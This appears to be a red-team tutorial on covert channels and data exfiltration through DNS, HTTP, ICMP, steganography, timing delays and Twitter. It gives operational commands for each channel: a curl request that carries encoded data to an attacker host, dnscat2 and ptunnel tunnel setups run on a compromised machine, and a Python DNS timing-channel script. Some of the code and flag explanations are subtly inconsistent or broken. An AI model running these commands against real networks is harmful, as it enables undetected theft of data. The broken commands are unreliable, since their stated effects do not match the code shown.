Red Team Operations - Covert Channels and Exfiltration Techniques

As a Red Team operator, one of the most important aspects of your job is to exfiltrate data from your target’s network without being detected. In this article, we will discuss some of the covert channels and exfiltration techniques that can be used for this purpose.

Covert Channels

A covert channel is a communication channel that is not intended to be used for communication between two entities. For example, an attacker can use a covert channel to communicate with a compromised system without being detected by the system’s security mechanisms. Some examples of covert channels include:

DNS Tunneling

DNS tunneling involves using the DNS protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the DNS protocol to send and receive commands to a compromised system.

To use DNS tunneling, the attacker can set up a DNS server that can receive and interpret DNS requests. The attacker can then encode data in the DNS requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the DNS requests.

Tools like Dnscat2, Iodine, and Dns2tcp can be used to create DNS tunnels.

HTTP/S Tunneling

HTTP/S tunneling involves using the HTTP/S protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the HTTP/S protocol to send and receive commands to a compromised system.

To use HTTP/S tunneling, the attacker can set up a web server that can receive and interpret HTTP/S requests. The attacker can then encode data in the HTTP/S requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the HTTP/S requests.

Tools like Chisel, HTTPTunnel, and Httptunnel-ng can be used to create HTTP/S tunnels.

ICMP Tunneling

ICMP tunneling involves using the ICMP protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the ICMP protocol to send and receive commands to a compromised system.

To use ICMP tunneling, the attacker can set up an ICMP server that can receive and interpret ICMP requests. The attacker can then encode data in the ICMP requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the ICMP requests.

Tools like ICMPTunnel and Ptunnel can be used to create ICMP tunnels.

Exfiltration Techniques

Exfiltration is the process of stealing data from a target’s network. Red Team operators need to be able to exfiltrate data without being detected. Some examples of exfiltration techniques include:

Steganography

Steganography is the art of hiding data within another file. It involves embedding the data within a file so that it is not visible to the naked eye. For example, an attacker can hide data within an image or a video file. The attacker can then exfiltrate the file without being detected.

To use steganography, the attacker can use tools like Steghide, OpenStego, or Stegano to embed data within an image or a video file. Let’s take a look at Steghide in action:

$ steghide embed -cf image.jpg -ef secret.txt -p password

This command will embed the secret.txt file within the image.jpg file using the password “password”. The resulting file will look identical to the original image, but it will contain the secret.txt file within it.

To extract the hidden data, the attacker can use the following command:

$ steghide extract -sf image.jpg -p password

This command will extract the secret.txt file from the image.jpg file using the password “password”.

Out-of-band Exfiltration

Let’s take a look at an advanced example of out-of-band exfiltration.

Out-of-band exfiltration involves using a separate channel or protocol to exfiltrate data, separate from the primary communication channel. This technique can be used to bypass firewalls and other security mechanisms that block the primary communication channel.

One advanced example of out-of-band exfiltration is using covert timing channels to exfiltrate data. Covert timing channels involve encoding data in the timing of network traffic, such as the time between packets or the timing of packets themselves.

For example, the attacker could use the timing between DNS requests to encode data. The attacker could create a program that sends DNS requests to a DNS server, with the timing between requests indicating the encoded data. For example, a short delay between requests could indicate a “0” bit, while a longer delay could indicate a “1” bit.

Here’s an example of how this could be done using Python:

import socket
import time

def exfiltrate_data(encoded_data):
    dns_server = "dns_server_ip"
    delay_0 = 0.1
    delay_1 = 0.2

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect((dns_server, 53))

    for bit in encoded_data:
        if bit == "0":
            time.sleep(delay_0)
        elif bit == "1":
            time.sleep(delay_1)

        s.send("dns_request_data")

    s.close()

This Python program creates a UDP socket and connects to the DNS server at dns_server_ip. The program then sends DNS requests to the DNS server, with the timing between requests indicating the encoded data. The delay_0 and delay_1 variables specify the delay times for “0” and “1” bits, respectively.

Using covert timing channels to exfiltrate data can be effective, but it also has its risks. Covert timing channels can be difficult to implement correctly and can be detected by some network security solutions that monitor network traffic for unusual timing patterns.

Additionally, encoding data in the timing of network traffic can be relatively slow and inefficient, limiting the amount of data that can be exfiltrated in a given period of time. As with all exfiltration techniques, it’s important to carefully consider the target environment and the specific exfiltration technique being used to ensure its effectiveness and stealth.

Social Media Exfiltration

Social media platforms are a common form of communication, and their traffic is typically allowed through firewalls and other security mechanisms. This makes social media a potentially effective channel for exfiltrating data in a covert manner.

To use social media as a covert channel, the attacker can set up an account on a social media platform and use it to communicate with a compromised system. The attacker can then encode the exfiltrated data in social media posts, comments, or direct messages.

For example, the attacker could use Twitter to create a covert channel. The attacker could set up a Twitter account and post messages that contain encoded data. The encoded data could be hidden within the message text, hashtags, or even in the URL of a linked website. The attacker could then use a script to periodically check the Twitter account and retrieve the encoded data.

Here’s an example of how this could be done using Python:

import tweepy

consumer_key = 'YOUR_CONSUMER_KEY'
consumer_secret = 'YOUR_CONSUMER_SECRET'
access_token = 'YOUR_ACCESS_TOKEN'
access_token_secret = 'YOUR_ACCESS_TOKEN_SECRET'

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)

api = tweepy.API(auth)

def check_twitter():
    tweets = api.user_timeline()
    for tweet in tweets:
        # check for encoded data in tweet text, hashtags, or linked URLs
        # decode the data and store it

This Python script uses the Tweepy library to authenticate with the attacker’s Twitter account and retrieve the user’s timeline. The script then checks each tweet for encoded data and decodes it, storing it for later use.

Using social media as a covert channel for exfiltrating data can be effective, but it also has its risks. Social media platforms are monitored by security teams and law enforcement, so it’s important to carefully consider the target environment and the specific social media platform being used to ensure its effectiveness and stealth. It’s also important to use strong encryption and encoding techniques to ensure that the data being exfiltrated remains secure and cannot be easily decoded by unauthorized parties.

HTTP Exfiltration

Including data in HTTP headers is another way to exfiltrate data over HTTP in a covert manner. This technique involves encoding the data in the headers of HTTP requests and sending them to a web server. The web server can then decode the data and store it.

Here’s an example of how this technique could be used:

On the compromised machine:

$ curl --header "X-Exfil-Data: encoded_data" http://attacker_ip

This command uses the curl tool to send an HTTP request to the attacker’s web server at attacker_ip. The data to be exfiltrated is encoded and included in the “X-Exfil-Data” header of the HTTP request.

On the attacker’s machine:

$ tail -f access.log | grep "X-Exfil-Data"

This command uses the tail and grep tools to monitor the access log of the web server. The grep tool searches for HTTP requests that contain the “X-Exfil-Data” header, indicating that exfiltration data is present.

With this technique, the attacker can encode data in the headers of HTTP requests and send them to the web server, which can decode the data and store it. The data can then be retrieved by the attacker at a later time. Since HTTP traffic is typically allowed through firewalls and other security mechanisms, this technique can be effective at bypassing these security controls and exfiltrating data in a covert manner.

However, it’s important to note that some network security solutions may still detect HTTP exfiltration channels by monitoring the size and frequency of HTTP requests, so it’s important to carefully consider the target environment and the specific exfiltration technique being used to ensure its effectiveness and stealth. Additionally, encoding the data in the headers of HTTP requests may limit the amount of data that can be exfiltrated in each request, making it less efficient for exfiltrating large amounts of data.

DNS Exfiltration

DNS exfiltration involves using the DNS protocol to exfiltrate data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the DNS protocol to exfiltrate data from a compromised system.

To use DNS exfiltration, the attacker can set up a DNS server that can receive and interpret DNS requests. The attacker can then encode the data in the DNS requests and send them to the DNS server. The DNS server can then decode the data and store it.

Tools like Dnscat2, Iodine, and Dns2tcp can be used to create DNS exfiltration channels.

Let’s take a look at how Dnscat2 can be used to create a DNS exfiltration channel:

On the attacker’s machine:

$ dnscat2 -r dns_server_domain

This command starts the Dnscat2 tool in server mode and specifies the domain of the DNS server.

On the compromised machine:

$ dnscat2 -c dns_server_domain

This command starts the Dnscat2 tool in client mode and specifies the domain of the DNS server.

The client can then use Dnscat2 to send and receive data through the DNS exfiltration channel.

ICMP Exfiltration

ICMP exfiltration involves using the ICMP protocol to exfiltrate data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the ICMP protocol to exfiltrate data from a compromised system.

To use ICMP exfiltration, the attacker can set up an ICMP server that can receive and interpret ICMP requests. The attacker can then encode the data in the ICMP requests and send them to the ICMP server. The ICMP server can then decode the data and store it.

Tools like ICMPTunnel and Ptunnel can be used to create ICMP exfiltration channels.

Let’s take a look at how Ptunnel can be used to create an ICMP exfiltration channel:

On the attacker’s machine:

$ ptunnel -p 80 -lp 8000 -da icmp_server_ip -dp 1234

This command starts the Ptunnel tool and specifies that it should listen on port 80, bind to port 8000, send data to the ICMP server at icmp_server_ip on port 1234.

On the compromised machine:

$ ptunnel -c icmp_server_ip -lp 1234 -da attacker_ip -dp 8000

This command starts the Ptunnel tool and specifies that it should connect to the ICMP server at icmp_server_ip on port 1234, bind to port 8000, and send data to the attacker’s machine at attacker_ip on port 80.

The client can then use Ptunnel to send and receive data through the ICMP exfiltration channel.

Real-World Examples

Let’s take a look at some real-world examples of covert channels and exfiltration techniques in action:

1. APT10 Group: The APT10 group, also known as Stone Panda, is a Chinese hacking group that has been active since at least 2009. In 2018, the group was accused of stealing sensitive data from companies in the United States and Europe.

   The group used a custom-built malware called “RedLeaves” to steal data from its targets. RedLeaves used a covert channel to communicate with the group’s command-and-control server. The covert channel used the HTTP protocol to send and receive data.

2. APT29 Group: The APT29 group, also known as Cozy Bear, is a Russian hacking group that has been active since at least 2010. In 2016, the group was accused of hacking into the Democratic National Committee’s (DNC) computer network.

   The group used a custom-built malware called “CozyDuke” to steal data from the DNC’s network. CozyDuke used a covert channel to communicate with the group’s command-and-control server. The covert channel used the HTTP protocol to send and receive data.

3. Operation Aurora: Operation Aurora was a cyber attack that occurred in 2009 and 2010. The attack targeted several large companies, including Google, Adobe, and Intel.

   The attackers used a custom-built malware called “Hydraq” to steal data from the targeted companies. Hydraq used a covert channel to communicate with the attackers’ command-and-control server. The covert channel used the HTTP protocol to send and receive data.

Conclusion

In conclusion, Red Team operations require advanced and covert techniques for communication and exfiltration. Covert communication channels are essential to ensure that the Red Team operators can communicate and exfiltrate data without detection. In this article, we have explored a range of covert communication and exfiltration techniques, from protocol-level channels to out-of-band exfiltration techniques.

It is important to note that every target environment is different, and the appropriate communication and exfiltration techniques will depend on the specific target and the security mechanisms in place. Red Team operators must carefully consider their options and choose the appropriate techniques based on their goals and the target environment.

It is also important to use strong encryption and encoding techniques to ensure that the data being exfiltrated remains secure and cannot be easily decoded by unauthorized parties. Additionally, Red Team operators should regularly test and evaluate their communication and exfiltration techniques to ensure their effectiveness and stealth.

Overall, Red Team operations require advanced techniques and careful planning to be successful. By using covert communication and exfiltration techniques, Red Team operators can communicate and exfiltrate data without detection, enabling them to achieve their goals and provide valuable insights into the security posture of the target environment.